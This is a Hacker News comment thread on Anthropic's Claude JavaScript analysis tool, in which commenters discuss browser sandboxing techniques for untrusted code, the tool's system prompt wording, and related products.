Notes on the new Claude analysis JavaScript code execution tool

(simonwillison.net)

105 points | by bstsb 11 hours ago ago

33 comments

  • animal_spirits 5 hours ago

    That's an interesting idea to generate javascript and execute it client side rather than server side. I'm sure that saves a ton of money for Anthropic not by not having to spin up a server for each execution.

    • qeternity 3 hours ago

      The cost savings for this are going to be a rounding error. I imagine this is a broader push to be able to have Claude pilot your browser (and other applications) in the future. This is the right way to go about it versus having a headless agent: users can be in the loop and you can bootstrap and existing environment.

      Otoh it’s going to be a security nightmare.

    • bhl 2 hours ago

      Makes a lot of sense given they released Artifacts previously, which let you build simple web apps.

      The browser nowadays can be a web dev environment with nodebox and webcontainers; and JavaScript is the default language there.

      Allows you to build experiences like interactive charts easier.

    • stanleydrew 3 hours ago

      Also means you're not having to do a bunch of isolation work to make the server-side execution environment safe.

      • Me1000 2 hours ago

        This is the real value here. Keeping a secure environment to run untrusted code along side user data is a real liability for them. It's not their core competency either, so they can just lean on browser sandboxing and not worry about it.

        • cruffle_duffle 31 minutes ago

          How is doing it server side a different challenge than something like google collab or any of those Jupyter notebook type services?

  • advaith08 3 hours ago

    The custom instructions to the model say:

    "Please note that this is similar but not identical to the antArtifact syntax which is used for Artifacts; sorry for the ambiguity."

    They seem to be apologizing to the model in the system prompt?? This is so intriguing

    • lelandfe 2 hours ago

      Unfortunately, their prompt engineer learned of Roko's basilisk

    • l1n an hour ago

      Multiple system prompt segments can be composed depending on needs, so it's useful for this sort of thing to be there to resolve inconsistencies.

    • therein 2 hours ago

      I wonder if they tried the following:

      > Please note that this is similar but not identical to the antArtifact syntax which is used for Artifacts; sorry for the ambiguity, antArtifact syntax was developed by the late grandmother of one our engineers and holds sentimental value.

    • andai 2 hours ago

      Has anyone looked into the effect of politeness on performance?

      • pawelduda an hour ago

        If you assume asking someone nicely is more likely for them to try help you, and this tendency shows in the training set, wouldn't you be more likely to "retrieve" a better answer from the model trained on it? Take this with a grain of salt, it's just my guess not backed by anything

  • simonw 5 hours ago

    I've been trying to figure out the right pattern for running untrusted JavaScript code in a browser sandbox that's controlled by a page for a while now, looks like Anthropic have figured that out. Hoping someone can reverse engineer exactly how they are doing this - their JavaScript code is too obfuscated for me to dig out the tricks, sadly.

    • spankalee 4 hours ago

      The key is running the untrusted code in a cross-origin iframe so you can rely on the same-origin policies and `sandbox`[1].

      You can control the code in a number of ways - loading a trusted shim that sets up a postMessage handler is pretty common. You can be careful and do that in a way that untructed code can't forge messages to look like their from the trusted code.

      Another way is to use two iframes to the untrusted origin. One only loads untrusted code, the other loads a control API that talks to the trusted code. You can then to the loading into the iframe with a service worker. This is how the Playground Elements work (they're a set of web components that let you safely embed a mini IDE for code samples) https://github.com/google/playground-elements

      [1]: https://developer.mozilla.org/en-US/docs/Web/HTML/Element/if...

      • purple-leafy 31 minutes ago

        The cross origin iframe method is the same I’ve employed in A few browser extensions I’ve built

    • TimTheTinker 4 hours ago

      You should check out how Figma plugins work. They have blog posts on all the tradeoffs they considered.

      What I believe they settled on was a JS interpreter compiled to WASM -- it can run arbitrary JS but with very well-defined and restricted interfaces to the outside world (the browser's JS runtime environment).

    • h1fra 3 hours ago

      Much easier in the browser that has V8 isolate, however even with webworkers you still want to control CPU/network hijacking which is not ideal.

      If it's only the user's own code it's fine but if they can run code from others it's a massive pain indeed.

      On the server it's still not easy in 2024, even with Firecracker (doesn't work on mac), Workerd (is a subset of NodeJS), isolated-vm (only pre-compiled code, no modules).

    • dartos 5 hours ago

      Isn’t that how all JavaScript code runs in a browser?

      • TheRealPomax 4 hours ago

        Isn't what how all JS runs in the browser? There are different restrictions based on where JS comes from, and what context it gets loaded into.

        • dartos 23 minutes ago

          All browser js runs in a browser sandbox and, by default, none of it needs to be explicitly trusted in most browsers.

          I don’t think there are very many restrictions on what js can do on a given page. At least none come to mind.

          Not really sure you mean by “context” either. Maybe service workers? Unless you’re talking about loading js within iframes… but that’s a different can of worms.

    • aabhay 5 hours ago

      What are the attack vectors for a web browser js environment to do malicious things? All browser code is sandboxed via origin controls, and process isolation. It can’t even open an iframe and read the contents of that iframe.

      • TimTheTinker 4 hours ago

        It's a fine place to run code trusted by the server (or code trusted by the client within the scope of the app).

        But for code not trusted by either, it's bad -- user data in the app can be compromised/exfiltrated.

        Hence for third-party plugins for a web app, the built-in JS runtime doesn't have sufficient trust management capability.

      • njtransit 4 hours ago

        The attack vectors are either some type of credential or account compromise. Generally, these attacks fall under the cross-site scripting (XSS) umbrella. The browser exposes certain things to the JS context based on the origin. E.g. if you log in to facebook.com, facebook.com might set an authentication cookie that can be accessed in the JS context. Additionally, all outbound requests to facebook.com will include this authentication cookie. So, if you can execute JS in the context of facebook.com, you could steal this cookie or have the browser perform malicious actions that get implicitly authenticated.

  • thenaturalist 4 hours ago

    Funnily enough, I test code generation both on unpaid Claude and ChatGPT.

    When working with Python, I've found Sonnet (pre 3.5) to be quite superior to ChatGPT (mostly 4, sometimes 3.5) with regards to verbosity, structure and prompt / instruct comprehension.

    I've switched to a JavaScript project two weeks ago and the tables have turned.

    Sonnet 3.5 is much more verbose and I need to make corrections a few times, whereas ChatGPTs output is shorter and on point.

    I'll closely follow if this improves if Claude are focussing on JS themselves.

  • mritchie712 4 hours ago

    duckdb-wasm[0] would be a good addition here. We use it in Definite[1] and I can't say enough good things about duckdb in general.

    0 - https://github.com/duckdb/duckdb-wasm

    1 - https://www.definite.app/

    • refulgentis 4 hours ago

      Interesting: I'm curious, what about it helps here specifically.

      Approaching it naively and undercaffeinated, it sounds abstract, as in it would benefit the way any code could benefit from a persistence layer / DB

      Also I'm curious if it would require a special one-off integration to make it work, or could it write JS that just imported the library?

  • koolala 5 hours ago

    JavaScript is the perfect language for this. I can't wait for a sandboxed coding environment to totally set AI loose.

    • mlejva 4 hours ago

      Shameless plug here. We're building exactly this at E2B [0] (I'm the CEO). Sandboxed cloud environments for running AI-generated code. We're fully open-source [1] as well.

      [0] https://e2b.dev

      [1] https://github.com/e2b-dev

      • bhl an hour ago

        Is sandboxed browser environments on your roadmap? Would much prefer to use the client's runtime for non-computational expensive things like web dev.

    • croes 4 hours ago

      They could run a little crypto miner to get more profit

  • willsmith72 4 hours ago

    This is a great step, but to me not very useful until the move out of context. Still I'm high on anthropic and happy gen ai didn't turn into a winner-take-all market like everyone predicted in 2021.